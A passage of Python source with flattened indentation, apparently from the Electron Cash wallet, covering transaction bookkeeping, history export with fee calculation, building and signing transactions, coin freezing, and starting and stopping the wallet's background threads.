if defunct_ct and debug:
self.print_error(f"{me.name}: DEBUG", defunct_ct, "defunct txos removed in", time.time()-t0, "secs")
ct = 0
for prevout_hash, s in txid_n.copy().items():
try:
with self.lock:
tx = self.transactions.get(prevout_hash)
if tx is None:
tx = Transaction.tx_cache_get(prevout_hash)
if isinstance(tx, Transaction):
tx = Transaction(tx.raw) # take a copy
else:
if debug: self.print_error(f"{me.name}: DEBUG retrieving txid", prevout_hash, "...")
t1 = time.time()
tx = Transaction(self.network.synchronous_get(('blockchain.transaction.get', [prevout_hash])))
if debug: self.print_error(f"{me.name}: DEBUG network retrieve took", time.time()-t1, "secs")
# Paranoia; intended side effect of the below assert
# is to also deserialize the tx (by calling the slow
# .txid()) which ensures the tx from the server
# is not junk.
assert prevout_hash == tx.txid(), "txid mismatch"
Transaction.tx_cache_put(tx, prevout_hash) # will cache a copy
except Exception as e:
self.print_error(f"{me.name}: Error retrieving txid", prevout_hash, ":", repr(e))
if not keep_running(): # in case we got a network timeout *and* the wallet was closed
return
continue
if not keep_running():
return
for prevout_n in s.copy():
ser = mkser(prevout_hash, prevout_n)
try:
txo = tx.outputs()[prevout_n]
except IndexError:
self.print_error(f"{me.name}: ERROR -- could not find output", ser)
rm(ser, True, tup=(prevout_hash, prevout_n))
continue
_typ, addr, v = txo
rm_pruned_too = False
with self.lock:
mine = self.is_mine(addr)
if not mine and ser in self.pruned_txo:
ct += 1
rm_pruned_too = True
rm(ser, rm_pruned_too, tup=(prevout_hash, prevout_n))
if rm_pruned_too and debug:
self.print_error(f"{me.name}: DEBUG removed", ser)
if ct:
with self.lock:
# Save changes to storage -- this is cheap and doesn't
# actually write to file yet, just flags storage as
# 'dirty' for when wallet.storage.write() is called
# later.
self.storage.put('pruned_txo', self.pruned_txo)
self.print_error(f"{me.name}: removed", ct,
"(non-relevant) pruned_txo's in",
f'{time.time()-t0:3.2f}', "seconds")
except:
import traceback
self.print_error(f"{me.name}:", traceback.format_exc())
raise
finally:
self.print_error(f"{me.name}: thread exiting")
def add_transaction(self, tx_hash, tx):
if not tx.inputs():
# bad tx came in off the wire -- all 0's or something, see #987
self.print_error("add_transaction: WARNING a tx came in from the network with 0 inputs! Bad server? Ignoring tx:", tx_hash)
return
is_coinbase = tx.inputs()[0]['type'] == 'coinbase'
with self.lock:
# HELPER FUNCTIONS
def add_to_self_txi(tx_hash, addr, ser, v):
''' addr must be 'is_mine' '''
d = self.txi.get(tx_hash)
if d is None:
self.txi[tx_hash] = d = {}
l = d.get(addr)
if l is None:
d[addr] = l = []
l.append((ser, v))
def find_in_self_txo(prevout_hash: str, prevout_n: int) -> tuple:
''' Returns a tuple of the (Address,value) for a given
prevout_hash:prevout_n, or (None, None) if not found. If valid
return, the Address object is found by scanning self.txo. The
lookup below is relatively fast in practice even on pathological
wallets. '''
dd = self.txo.get(prevout_hash, {})
for addr2, item in dd.items():
for n, v, is_cb in item:
if n == prevout_n:
return addr2, v
return (None, None)
def txin_get_info(txin):
prevout_hash = txi['prevout_hash']
prevout_n = txi['prevout_n']
ser = prevout_hash + ':%d'%prevout_n
return prevout_hash, prevout_n, ser
def put_pruned_txo(ser, tx_hash):
self.pruned_txo[ser] = tx_hash
self.pruned_txo_values.add(tx_hash)
t = self.pruned_txo_cleaner_thread
if t and t.q: t.q.put(ser)
def pop_pruned_txo(ser):
next_tx = self.pruned_txo.pop(ser, None)
if next_tx:
self.pruned_txo_values.discard(next_tx)
t = self.pruned_txo_cleaner_thread
if t and t.q: t.q.put('r_' + ser) # notify of removal
return next_tx
# /HELPER FUNCTIONS
# add inputs
self.txi[tx_hash] = d = {}
for txi in tx.inputs():
if txi['type'] == 'coinbase':
continue
addr = txi.get('address')
# find value from prev output
if self.is_mine(addr):
prevout_hash, prevout_n, ser = txin_get_info(txi)
dd = self.txo.get(prevout_hash, {})
for n, v, is_cb in dd.get(addr, []):
if n == prevout_n:
add_to_self_txi(tx_hash, addr, ser, v)
break
else:
# Coin's spend tx came in before its receive tx: flag
# the spend for when the receive tx will arrive into
# this function later.
put_pruned_txo(ser, tx_hash)
self._addr_bal_cache.pop(addr, None) # invalidate cache entry
del dd, prevout_hash, prevout_n, ser
elif addr is None:
# Unknown/unparsed address.. may be a strange p2sh scriptSig
# Try and find it in txout's if it's one of ours.
# See issue #895.
prevout_hash, prevout_n, ser = txin_get_info(txi)
# Find address in self.txo for this prevout_hash:prevout_n
addr2, v = find_in_self_txo(prevout_hash, prevout_n)
if addr2 is not None and self.is_mine(addr2):
add_to_self_txi(tx_hash, addr2, ser, v)
self._addr_bal_cache.pop(addr2, None) # invalidate cache entry
else:
# Not found in self.txo. It may still be one of ours
# however since tx's can come in out of order due to
# CTOR, etc, and self.txo may not have it yet. So we
# flag the spend now, and when the out-of-order prevout
# tx comes in later for this input (if it's indeed one
# of ours), the real address for this input will get
# picked up then in the "add outputs" section below in
# this function. At that point, self.txi will be
# properly updated to indicate the coin in question was
# spent via an add_to_self_txi call.
#
# If it's *not* one of ours, however, the below will
# grow pruned_txo with an irrelevant entry. However, the
# irrelevant entry will eventually be reaped and removed
# by the self.pruned_txo_cleaner_thread which runs
# periodically in the background.
put_pruned_txo(ser, tx_hash)
del addr2, v, prevout_hash, prevout_n, ser
# don't keep empty entries in self.txi
if not d:
self.txi.pop(tx_hash, None)
# add outputs
self.txo[tx_hash] = d = {}
op_return_ct = 0
deferred_cashacct_add = None
for n, txo in enumerate(tx.outputs()):
ser = tx_hash + ':%d'%n
_type, addr, v = txo
mine = False
if isinstance(addr, ScriptOutput):
if addr.is_opreturn():
op_return_ct += 1
if isinstance(addr, cashacct.ScriptOutput):
# auto-detect CashAccount registrations we see,
# and notify cashacct subsystem of that fact. But we
# can only do it after making sure it's the *only*
# OP_RETURN in the tx.
deferred_cashacct_add = (
lambda _tx_hash=tx_hash, _tx=tx, _n=n, _addr=addr:
self.cashacct.add_transaction_hook(_tx_hash, _tx, _n, _addr)
)
elif self.is_mine(addr):
# add coin to self.txo since it's mine.
mine = True
l = d.get(addr)
if l is None:
d[addr] = l = []
l.append((n, v, is_coinbase))
del l
self._addr_bal_cache.pop(addr, None) # invalidate cache entry
# give v to txi that spends me
next_tx = pop_pruned_txo(ser)
if next_tx is not None and mine:
add_to_self_txi(next_tx, addr, ser, v)
# don't keep empty entries in self.txo
if not d:
self.txo.pop(tx_hash, None)
# save
self.transactions[tx_hash] = tx
# Invoke the cashacct add hook (if defined) here at the end, with
# the lock held. We accept the cashacct.ScriptOutput only iff
# op_return_ct == 1 as per the Cash Accounts spec.
# See: https://gitlab.com/cash-accounts/lookup-server/blob/master/routes/parser.js#L253
if op_return_ct == 1 and deferred_cashacct_add:
deferred_cashacct_add()
# Unconditionally invoke the SLP handler. Note that it is a fast &
# cheap no-op if this tx's outputs[0] is not an SLP script.
self.slp.add_tx(tx_hash, tx)
def remove_transaction(self, tx_hash):
with self.lock:
self.print_error("removing tx from history", tx_hash)
# Note that we don't actually remove the tx_hash from
# self.transactions, but instead rely on the unreferenced tx being
# removed the next time the wallet is loaded in self.load_transactions()
for ser, hh in list(self.pruned_txo.items()):
if hh == tx_hash:
self.pruned_txo.pop(ser)
self.pruned_txo_values.discard(hh)
# add tx to pruned_txo, and undo the txi addition
for next_tx, dd in self.txi.items():
for addr, l in list(dd.items()):
ll = l[:]
for item in ll:
ser, v = item
prev_hash, prev_n = ser.split(':')
if prev_hash == tx_hash:
self._addr_bal_cache.pop(addr, None) # invalidate cache entry
l.remove(item)
self.pruned_txo[ser] = next_tx
self.pruned_txo_values.add(next_tx)
if l == []:
dd.pop(addr)
else:
dd[addr] = l
# invalidate addr_bal_cache for outputs involving this tx
d = self.txo.get(tx_hash, {})
for addr in d:
self._addr_bal_cache.pop(addr, None) # invalidate cache entry
try: self.txi.pop(tx_hash)
except KeyError: self.print_error("tx was not in input history", tx_hash)
try: self.txo.pop(tx_hash)
except KeyError: self.print_error("tx was not in output history", tx_hash)
# do this with the lock held
self.cashacct.remove_transaction_hook(tx_hash)
# inform slp subsystem as well
self.slp.rm_tx(tx_hash)
def receive_tx_callback(self, tx_hash, tx, tx_height):
self.add_transaction(tx_hash, tx)
self.add_unverified_tx(tx_hash, tx_height)
if self.network and self.network.callback_listener_count("payment_received") > 0:
for _, addr, _ in tx.outputs():
status = self.get_request_status(addr) # returns PR_UNKNOWN quickly if addr has no requests, otherwise returns tuple
if status != PR_UNKNOWN:
status = status[0] # unpack status from tuple
self.network.trigger_callback('payment_received', self, addr, status)
def receive_history_callback(self, addr, hist, tx_fees):
with self.lock:
old_hist = self.get_address_history(addr)
for tx_hash, height in old_hist:
if (tx_hash, height) not in hist:
s = self.tx_addr_hist.get(tx_hash)
if s:
s.discard(addr)
if not s:
# if no address references this tx anymore, kill it
# from txi/txo dicts.
if s is not None:
# We won't keep empty sets around.
self.tx_addr_hist.pop(tx_hash)
# note this call doesn't actually remove the tx from
# storage, it merely removes it from the self.txi
# and self.txo dicts
self.remove_transaction(tx_hash)
self._addr_bal_cache.pop(addr, None) # unconditionally invalidate cache entry
self._history[addr] = hist
for tx_hash, tx_height in hist:
# add it in case it was previously unconfirmed
self.add_unverified_tx(tx_hash, tx_height)
# add reference in tx_addr_hist
self.tx_addr_hist[tx_hash].add(addr)
# if addr is new, we have to recompute txi and txo
tx = self.transactions.get(tx_hash)
if tx is not None and self.txi.get(tx_hash, {}).get(addr) is None and self.txo.get(tx_hash, {}).get(addr) is None:
self.add_transaction(tx_hash, tx)
# Store fees
self.tx_fees.update(tx_fees)
if self.network:
self.network.trigger_callback('on_history', self)
def get_history(self, domain=None, *, reverse=False):
# get domain
if domain is None:
domain = self.get_addresses()
# 1. Get the history of each address in the domain, maintain the
# delta of a tx as the sum of its deltas on domain addresses
tx_deltas = defaultdict(int)
for addr in domain:
h = self.get_address_history(addr)
for tx_hash, height in h:
delta = self.get_tx_delta(tx_hash, addr)
if delta is None or tx_deltas[tx_hash] is None:
tx_deltas[tx_hash] = None
else:
tx_deltas[tx_hash] += delta
# 2. create sorted history
history = []
for tx_hash in tx_deltas:
delta = tx_deltas[tx_hash]
height, conf, timestamp = self.get_tx_height(tx_hash)
history.append((tx_hash, height, conf, timestamp, delta))
history.sort(key = lambda x: self.get_txpos(x[0]), reverse=True)
# 3. add balance
c, u, x = self.get_balance(domain)
balance = c + u + x
h2 = []
for tx_hash, height, conf, timestamp, delta in history:
h2.append((tx_hash, height, conf, timestamp, delta, balance))
if balance is None or delta is None:
balance = None
else:
balance -= delta
if not reverse:
h2.reverse()
return h2
def export_history(self, domain=None, from_timestamp=None, to_timestamp=None, fx=None,
show_addresses=False, decimal_point=8,
*, fee_calc_timeout=10.0, download_inputs=False,
progress_callback=None):
''' Export history. Used by RPC & GUI.
Arg notes:
- `fee_calc_timeout` is used when computing the fee (which is done
asynchronously in another thread) to limit the total amount of time in
seconds spent waiting for fee calculation. The timeout is a total time
allotment for this function call. (The reason the fee calc can take a
long time is for some pathological tx's, it is very slow to calculate
fee as it involves deserializing prevout_tx from the wallet, for each
input).
- `download_inputs`, if True, will allow for more accurate fee data to
be exported with the history by using the Transaction class input
fetcher to download *all* prevout_hash tx's for inputs (even for
inputs not in wallet). This feature requires self.network (ie, we need
to be online) otherwise it will behave as if download_inputs=False.
- `progress_callback`, if specified, is a callback which receives a
single float argument in the range [0.0,1.0] indicating how far along
the history export is going. This is intended for interop with GUI
code. Node the progress callback is not guaranteed to be called in the
context of the main thread, therefore GUI code should use appropriate
signals/slots to update the GUI with progress info.
Note on side effects: This function may update self.tx_fees. Rationale:
it will spend some time trying very hard to calculate accurate fees by
examining prevout_tx's (leveraging the fetch_input_data code in the
Transaction class). As such, it is worthwhile to cache the results in
self.tx_fees, which gets saved to wallet storage. This is not very
demanding on storage as even for very large wallets with huge histories,
tx_fees does not use more than a few hundred kb of space. '''
from .util import timestamp_to_datetime
# we save copies of tx's we deserialize to this temp dict because we do
# *not* want to deserialize tx's in wallet.transactoins since that
# wastes memory
local_tx_cache = {}
# some helpers for this function
t0 = time.time()
def time_remaining(): return max(fee_calc_timeout - (time.time()-t0), 0)
class MissingTx(RuntimeError):
''' Can happen in rare circumstances if wallet history is being
radically reorged by network thread while we are in this code. '''
def get_tx(tx_hash):
''' Try to get a tx from wallet, then from the Transaction class
cache if that fails. In either case it deserializes the copy and
puts the deserialized tx in local stack dict local_tx_cache. The
reason we don't deserialize the tx's from self.transactions is that
we do not want to keep deserialized tx's in memory. The
self.transactions dict should contain just raw tx's (not
deserialized). Deserialized tx's eat on the order of 10x the memory
because because of the Python lists, dict, etc they contain, per
instance. '''
tx = local_tx_cache.get(tx_hash)
if tx:
return tx
tx = Transaction.tx_cache_get(tx_hash)
if not tx:
tx = copy.deepcopy(self.transactions.get(tx_hash))
if tx:
tx.deserialize()
local_tx_cache[tx_hash] = tx
else:
raise MissingTx(f'txid {tx_hash} dropped out of wallet history while exporting')
return tx
def try_calc_fee(tx_hash):
''' Try to calc fee from cheapest to most expensive calculation.
Ultimately asks the transaction class to look at prevouts in wallet and uses
that scheme as a last (more CPU intensive) resort. '''
fee = self.tx_fees.get(tx_hash)
if fee is not None:
return fee
def do_get_fee(tx_hash):
tx = get_tx(tx_hash)
def try_get_fee(tx):
try: return tx.get_fee()
except InputValueMissing: pass
fee = try_get_fee(tx)
t_remain = time_remaining()
if fee is None and t_remain:
q = queue.Queue()
def done():
q.put(1)
tx.fetch_input_data(self, use_network=bool(download_inputs), done_callback=done)
try: q.get(timeout=t_remain)
except queue.Empty: pass
fee = try_get_fee(tx)
return fee
fee = do_get_fee(tx_hash)
if fee is not None:
self.tx_fees[tx_hash] = fee # save fee to wallet if we bothered to dl/calculate it.
return fee
def fmt_amt(v, is_diff):
if v is None:
return '--'
return format_satoshis(v, decimal_point=decimal_point,
is_diff=is_diff)
# grab history
h = self.get_history(domain, reverse=True)
out = []
n, l = 0, max(1, float(len(h)))
for tx_hash, height, conf, timestamp, value, balance in h:
if progress_callback:
progress_callback(n/l)
n += 1
timestamp_safe = timestamp
if timestamp is None:
timestamp_safe = time.time() # set it to "now" so below code doesn't explode.
if from_timestamp and timestamp_safe < from_timestamp:
continue
if to_timestamp and timestamp_safe >= to_timestamp:
continue
try:
fee = try_calc_fee(tx_hash)
except MissingTx as e:
self.print_error(str(e))
continue
item = {
'txid' : tx_hash,
'height' : height,
'confirmations' : conf,
'timestamp' : timestamp_safe,
'value' : fmt_amt(value, is_diff=True),
'fee' : fmt_amt(fee, is_diff=False),
'balance' : fmt_amt(balance, is_diff=False),
}
if item['height'] > 0:
date_str = format_time(timestamp) if timestamp is not None else _("unverified")
else:
date_str = _("unconfirmed")
item['date'] = date_str
try:
# Defensive programming.. sanitize label.
# The below ensures strings are utf8-encodable. We do this
# as a paranoia measure.
item['label'] = self.get_label(tx_hash).encode(encoding='utf-8', errors='replace').decode(encoding='utf-8', errors='replace')
except UnicodeError:
self.print_error(f"Warning: could not export label for {tx_hash}, defaulting to ???")
item['label'] = "???"
if show_addresses:
tx = get_tx(tx_hash)
input_addresses = []
output_addresses = []
for x in tx.inputs():
if x['type'] == 'coinbase': continue
addr = x.get('address')
if addr == None: continue
input_addresses.append(addr.to_ui_string())
for _type, addr, v in tx.outputs():
output_addresses.append(addr.to_ui_string())
item['input_addresses'] = input_addresses
item['output_addresses'] = output_addresses
if fx is not None:
date = timestamp_to_datetime(timestamp_safe)
item['fiat_value'] = fx.historical_value_str(value, date)
item['fiat_balance'] = fx.historical_value_str(balance, date)
item['fiat_fee'] = fx.historical_value_str(fee, date)
out.append(item)
if progress_callback:
progress_callback(1.0) # indicate done, just in case client code expects a 1.0 in order to detect completion
return out
def get_label(self, tx_hash):
label = self.labels.get(tx_hash, '')
if not label:
label = self.get_default_label(tx_hash)
return label
def get_default_label(self, tx_hash):
if not self.txi.get(tx_hash):
d = self.txo.get(tx_hash, {})
labels = []
for addr in list(d.keys()): # use a copy to avoid possibility of dict changing during iteration, see #1328
label = self.labels.get(addr.to_storage_string())
if label:
labels.append(label)
return ', '.join(labels)
return ''
def get_tx_status(self, tx_hash, height, conf, timestamp):
if conf == 0:
tx = self.transactions.get(tx_hash)
if not tx:
return 3, 'unknown'
fee = self.tx_fees.get(tx_hash)
# we disable fee estimates in BCH for now.
#if fee and self.network and self.network.config.has_fee_estimates():
# size = len(tx.raw)/2
# low_fee = int(self.network.config.dynfee(0)*size/1000)
# is_lowfee = fee < low_fee * 0.5
#else:
# is_lowfee = False
# and instead if it's less than 1.0 sats/B we flag it as low_fee
try:
# NB len(tx.raw) is 2x the byte size as it's hex encoded.
is_lowfee = int(fee) / (int(len(tx.raw)) / 2.0) < 1.0 # if less than 1.0 sats/B, complain. otherwise don't.
except (TypeError, ValueError): # If for some reason fee was None or invalid, just pass on through.
is_lowfee = False
# /
if height < 0:
status = 0
elif height == 0 and is_lowfee:
status = 1
elif height == 0:
status = 2
else:
status = 3
else:
status = 3 + min(conf, 6)
time_str = format_time(timestamp) if timestamp else _("unknown")
status_str = _(TX_STATUS[status]) if status < 4 else time_str
return status, status_str
def relayfee(self):
return relayfee(self.network)
def dust_threshold(self):
return dust_threshold(self.network)
def make_unsigned_transaction(self, inputs, outputs, config, fixed_fee=None, change_addr=None, sign_schnorr=None):
''' sign_schnorr flag controls whether to mark the tx as signing with
schnorr or not. Specify either a bool, or set the flag to 'None' to use
whatever the wallet is configured to use from the GUI '''
sign_schnorr = self.is_schnorr_enabled() if sign_schnorr is None else bool(sign_schnorr)
# check outputs
i_max = None
for i, o in enumerate(outputs):
_type, data, value = o
if value == '!':
if i_max is not None:
raise BaseException("More than one output set to spend max")
i_max = i
# Avoid index-out-of-range with inputs[0] below
if not inputs:
raise NotEnoughFunds()
if fixed_fee is None and config.fee_per_kb() is None:
raise BaseException('Dynamic fee estimates not available')
for item in inputs:
self.add_input_info(item)
# change address
if change_addr:
change_addrs = [change_addr]
else:
# This new hook is for 'Cashshuffle Enabled' mode which will:
# Reserve a brand new change address if spending shuffled-only *or* unshuffled-only coins and
# disregard the "use_change" setting since to preserve privacy we must use a new change address each time.
# Pick and lock a new change address. This "locked" change address will not be used by the shuffle threads.
# Note that subsequent calls to this function will return the same change address until that address is involved
# in a tx and has a history, at which point a new address will get generated and "locked".
change_addrs = run_hook("get_change_addrs", self)
if not change_addrs: # hook gave us nothing, so find a change addr based on classic Electron Cash rules.
addrs = self.get_change_addresses()[-self.gap_limit_for_change:]
if self.use_change and addrs:
# New change addresses are created only after a few
# confirmations. Select the unused addresses within the
# gap limit; if none take one at random
change_addrs = [addr for addr in addrs if
self.get_num_tx(addr) == 0]
if not change_addrs:
change_addrs = [random.choice(addrs)]
else:
change_addrs = [inputs[0]['address']]
assert all(isinstance(addr, Address) for addr in change_addrs)
# Fee estimator
if fixed_fee is None:
fee_estimator = config.estimate_fee
else:
fee_estimator = lambda size: fixed_fee
if i_max is None:
# Let the coin chooser select the coins to spend
max_change = self.max_change_outputs if self.multiple_change else 1
coin_chooser = coinchooser.CoinChooserPrivacy()
tx = coin_chooser.make_tx(inputs, outputs, change_addrs[:max_change],
fee_estimator, self.dust_threshold(), sign_schnorr=sign_schnorr)
else:
sendable = sum(map(lambda x:x['value'], inputs))
_type, data, value = outputs[i_max]
outputs[i_max] = (_type, data, 0)
tx = Transaction.from_io(inputs, outputs, sign_schnorr=sign_schnorr)
fee = fee_estimator(tx.estimated_size())
amount = max(0, sendable - tx.output_value() - fee)
outputs[i_max] = (_type, data, amount)
tx = Transaction.from_io(inputs, outputs, sign_schnorr=sign_schnorr)
# If user tries to send too big of a fee (more than 50 sat/byte), stop them from shooting themselves in the foot
tx_in_bytes=tx.estimated_size()
fee_in_satoshis=tx.get_fee()
sats_per_byte=fee_in_satoshis/tx_in_bytes
if (sats_per_byte > 50):
raise ExcessiveFee()
return
# Sort the inputs and outputs deterministically
tx.BIP_LI01_sort()
# Timelock tx to current height.
locktime = self.get_local_height()
if locktime == -1: # We have no local height data (no headers synced).
locktime = 0
tx.locktime = locktime
run_hook('make_unsigned_transaction', self, tx)
return tx
def mktx(self, outputs, password, config, fee=None, change_addr=None, domain=None, sign_schnorr=None):
coins = self.get_spendable_coins(domain, config)
tx = self.make_unsigned_transaction(coins, outputs, config, fee, change_addr, sign_schnorr=sign_schnorr)
self.sign_transaction(tx, password)
return tx
def is_frozen(self, addr):
''' Address-level frozen query. Note: this is set/unset independent of
'coin' level freezing. '''
assert isinstance(addr, Address)
return addr in self.frozen_addresses
def is_frozen_coin(self, utxo):
''' 'coin' level frozen query. `utxo' is a prevout:n string, or a dict
as returned from get_utxos(). Note: this is set/unset independent of
'address' level freezing. '''
assert isinstance(utxo, (str, dict))
if isinstance(utxo, dict):
name = ("{}:{}".format(utxo['prevout_hash'], utxo['prevout_n']))
ret = name in self.frozen_coins or name in self.frozen_coins_tmp
if ret != utxo['is_frozen_coin']:
self.print_error("*** WARNING: utxo has stale is_frozen_coin flag", name)
utxo['is_frozen_coin'] = ret # update stale flag
return ret
else:
return utxo in self.frozen_coins or utxo in self.frozen_coins_tmp
def set_frozen_state(self, addrs, freeze):
''' Set frozen state of the addresses to `freeze`, True or False. Note
that address-level freezing is set/unset independent of coin-level
freezing, however both must be satisfied for a coin to be defined as
spendable. '''
if all(self.is_mine(addr) for addr in addrs):
if freeze:
self.frozen_addresses |= set(addrs)
else:
self.frozen_addresses -= set(addrs)
frozen_addresses = [addr.to_storage_string()
for addr in self.frozen_addresses]
self.storage.put('frozen_addresses', frozen_addresses)
return True
return False
def set_frozen_coin_state(self, utxos, freeze, *, temporary = False):
'''Set frozen state of the `utxos` to `freeze`, True or False. `utxos`
is a (possibly mixed) list of either "prevout:n" strings and/or
coin-dicts as returned from get_utxos(). Note that if passing prevout:n
strings as input, 'is_mine()' status is not checked for the specified
coin. Also note that coin-level freezing is set/unset independent of
address-level freezing, however both must be satisfied for a coin to be
defined as spendable.
The `temporary` flag only applies if `freeze = True`. In that case,
freezing coins will only affect the in-memory-only frozen set, which
doesn't get saved to storage. This mechanism was added so that plugins
(such as CashFusion) have a mechanism for ephemeral coin freezing that
doesn't persist across sessions.
Note that setting `freeze = False` effectively unfreezes both the
temporary and the permanent frozen coin sets all in 1 call. Thus after a
call to `set_frozen_coin_state(utxos, False), both the temporary and the
persistent frozen sets are cleared of all coins in `utxos`. '''
add_set = self.frozen_coins if not temporary else self.frozen_coins_tmp
def add(utxo):
add_set.add( utxo )
def discard(utxo):
self.frozen_coins.discard( utxo )
self.frozen_coins_tmp.discard( utxo )
apply_operation = add if freeze else discard
original_size = len(self.frozen_coins)
with self.lock:
ok = 0
for utxo in utxos:
if isinstance(utxo, str):
apply_operation( utxo )
ok += 1
elif isinstance(utxo, dict) and self.is_mine(utxo['address']):
txo = "{}:{}".format(utxo['prevout_hash'], utxo['prevout_n'])
apply_operation( txo )
utxo['is_frozen_coin'] = bool(freeze)
ok += 1
if original_size != len(self.frozen_coins):
# Performance optimization: only set storage if the perma-set
# changed.
self.storage.put('frozen_coins', list(self.frozen_coins))
return ok
def prepare_for_verifier(self):
# review transactions that are in the history
for addr, hist in self._history.items():
for tx_hash, tx_height in hist:
# add it in case it was previously unconfirmed
self.add_unverified_tx(tx_hash, tx_height)
# if we are on a pruning server, remove unverified transactions
with self.lock:
vr = list(self.verified_tx.keys()) + list(self.unverified_tx.keys())
for tx_hash in list(self.transactions):
if tx_hash not in vr:
self.print_error("removing transaction", tx_hash)
self.transactions.pop(tx_hash)
def start_threads(self, network):
self.network = network
if self.network:
self.start_pruned_txo_cleaner_thread()
self.prepare_for_verifier()
self.verifier = SPV(self.network, self)
self.synchronizer = Synchronizer(self, network)
finalization_print_error(self.verifier)
finalization_print_error(self.synchronizer)
network.add_jobs([self.verifier, self.synchronizer])
self.cashacct.start(self.network) # start cashacct network-dependent subsystem, nework.add_jobs, etc
else:
self.verifier = None
self.synchronizer = None
def stop_threads(self):
if self.network:
# Note: syncrhonizer and verifier will remove themselves from the
# network thread the next time they run, as a result of the below
# release() calls.
# It is done this way (as opposed to an immediate clean-up here)
# because these objects need to do thier clean-up actions in a
# thread-safe fashion from within the thread where they normally
# operate on their data structures.
self.cashacct.stop()
self.synchronizer.release()
self.verifier.release()
self.synchronizer = None
self.verifier = None
self.stop_pruned_txo_cleaner_thread()
# Now no references to the syncronizer or verifier
# remain so they will be GC-ed
self.storage.put('stored_height', self.get_local_height())
self.save_transactions()
self.save_verified_tx() # implicit cashacct.save
self.storage.put('frozen_coins', list(self.frozen_coins))
self.storage.write()
def start_pruned_txo_cleaner_thread(self):
self.pruned_txo_cleaner_thread = threading.Thread(target=self._clean_pruned_txo_thread, daemon=True, name='clean_pruned_txo_thread')
self.pruned_txo_cleaner_thread.q = queue.Queue()
self.pruned_txo_cleaner_thread.start()
def stop_pruned_txo_cleaner_thread(self):
t = self.pruned_txo_cleaner_thread
self.pruned_txo_cleaner_thread = None # this also signals a stop
if t and t.is_alive():
t.q.put(None) # signal stop
# if the join times out, it's ok. it means the thread was stuck in
# a network call and it will eventually exit.
t.join(timeout=3.0)
def wait_until_synchronized(self, callback=None):
def wait_for_wallet():
self.set_up_to_date(False)
while not self.is_up_to_date():
if callback:
msg = "%s\n%s %d"%(
_("Please wait..."),
_("Addresses generated:"),
len(self.addresses(True)))
callback(msg)
time.sleep(0.1)
def wait_for_network():
while not self.network.is_connected():
if callback:
msg = "%s \n" % (_("Connecting..."))
callback(msg)
time.sleep(0.1)
# wait until we are connected, because the user
# might have selected another server
if self.network:
wait_for_network()
wait_for_wallet()
else:
self.synchronize()
def can_export(self):
return not self.is_watching_only() and hasattr(self.keystore, 'get_private_key')
def is_used(self, address):
return self.get_address_history(address) and self.is_empty(address)
def is_empty(self, address):
assert isinstance(address, Address)
return not any(self.get_addr_balance(address))
def address_is_old(self, address, age_limit=2):
age = -1
local_height = self.get_local_height()
for tx_hash, tx_height in self.get_address_history(address):
if tx_height == 0:
tx_age = 0
else:
tx_age = local_height - tx_height + 1
if tx_age > age:
age = tx_age
if age > age_limit:
break # ok, it's old. not need to keep looping
return age > age_limit
def cpfp(self, tx, fee, sign_schnorr=None):
''' sign_schnorr is a bool or None for auto '''
sign_schnorr = self.is_schnorr_enabled() if sign_schnorr is None else bool(sign_schnorr)
txid = tx.txid()
for i, o in enumerate(tx.outputs()):
otype, address, value = o
if otype == TYPE_ADDRESS and self.is_mine(address):
break
else:
return
coins = self.get_addr_utxo(address)
item = coins.get(txid+':%d'%i)
if not item:
return
self.add_input_info(item)
inputs = [item]
outputs = [(TYPE_ADDRESS, address, value - fee)]
locktime = self.get_local_height()
# note: no need to call tx.BIP_LI01_sort() here - single input/output
return Transaction.from_io(inputs, outputs, locktime=locktime, sign_schnorr=sign_schnorr)
def add_input_info(self, txin):
address = txin['address']
if self.is_mine(address):
txin['type'] = self.get_txin_type(address)
# Bitcoin Cash needs value to sign
received, spent = self.get_addr_io(address)
item = received.get(txin['prevout_hash']+':%d'%txin['prevout_n'])
tx_height, value, is_cb = item
txin['value'] = value
self.add_input_sig_info(txin, address)
def can_sign(self, tx):
if tx.is_complete():
return False
for k in self.get_keystores():
# setup "wallet advice" so Xpub wallets know how to sign 'fd' type tx inputs
# by giving them the sequence number ahead of time
if isinstance(k, BIP32_KeyStore):
for txin in tx.inputs():
for x_pubkey in txin['x_pubkeys']:
_, addr = xpubkey_to_address(x_pubkey)
try:
c, index = self.get_address_index(addr)
except:
continue
if index is not None:
k.set_wallet_advice(addr, [c,index])
if k.can_sign(tx):
return True
return False
def get_input_tx(self, tx_hash):
# First look up an input transaction in the wallet where it
# will likely be. If co-signing a transaction it may not have
# all the input txs, in which case we ask the network.
tx = self.transactions.get(tx_hash)
if not tx and self.network:
request = ('blockchain.transaction.get', [tx_hash])
tx = Transaction(self.network.synchronous_get(request))
return tx
def add_input_values_to_tx(self, tx):
""" add input values to the tx, for signing"""
for txin in tx.inputs():
if 'value' not in txin:
inputtx = self.get_input_tx(txin['prevout_hash'])
if inputtx is not None:
out_zero, out_addr, out_val = inputtx.outputs()[txin['prevout_n']]
txin['value'] = out_val
txin['prev_tx'] = inputtx # may be needed by hardware wallets
def add_hw_info(self, tx):
# add previous tx for hw wallets, if needed and not already there
if any([(isinstance(k, Hardware_KeyStore) and k.can_sign(tx) and k.needs_prevtx()) for k in self.get_keystores()]):
for txin in tx.inputs():
if 'prev_tx' not in txin:
txin['prev_tx'] = self.get_input_tx(txin['prevout_hash'])
# add output info for hw wallets
info = {}
xpubs = self.get_master_public_keys()
for txout in tx.outputs():
_type, addr, amount = txout
if self.is_change(addr):
index = self.get_address_index(addr)
pubkeys = self.get_public_keys(addr)
# sort xpubs using the order of pubkeys
sorted_pubkeys, sorted_xpubs = zip(*sorted(zip(pubkeys, xpubs)))
info[addr] = index, sorted_xpubs, self.m if isinstance(self, Multisig_Wallet) else None, self.txin_type
tx.output_info = info
def sign_transaction(self, tx, password):
if self.is_watching_only():
return
# add input values for signing
self.add_input_values_to_tx(tx)
# hardware wallets require extra info
if any([(isinstance(k, Hardware_KeyStore) and k.can_sign(tx)) for k in self.get_keystores()]):
self.add_hw_info(tx)
# sign
for k in self.get_keystores():
try:
if k.can_sign(tx):
k.sign_transaction(tx, password)
except UserCancelled:
continue
def get_unused_addresses(self, *, for_change=False, frozen_ok=True):
# fixme: use slots from expired requests
with self.lock:
domain = self.get_receiving_addresses() if not for_change else (self.get_change_addresses() or self.get_receiving_addresses())
return [addr for addr in domain
if not self.get_address_history(addr)
and addr not in self.receive_requests
and (frozen_ok or addr not in self.frozen_addresses)]
def get_unused_address(self, *, for_change=False, frozen_ok=True):
addrs = self.get_unused_addresses(for_change=for_change, frozen_ok=frozen_ok)
if addrs:
return addrs[0]
def get_receiving_address(self, *, frozen_ok=True):
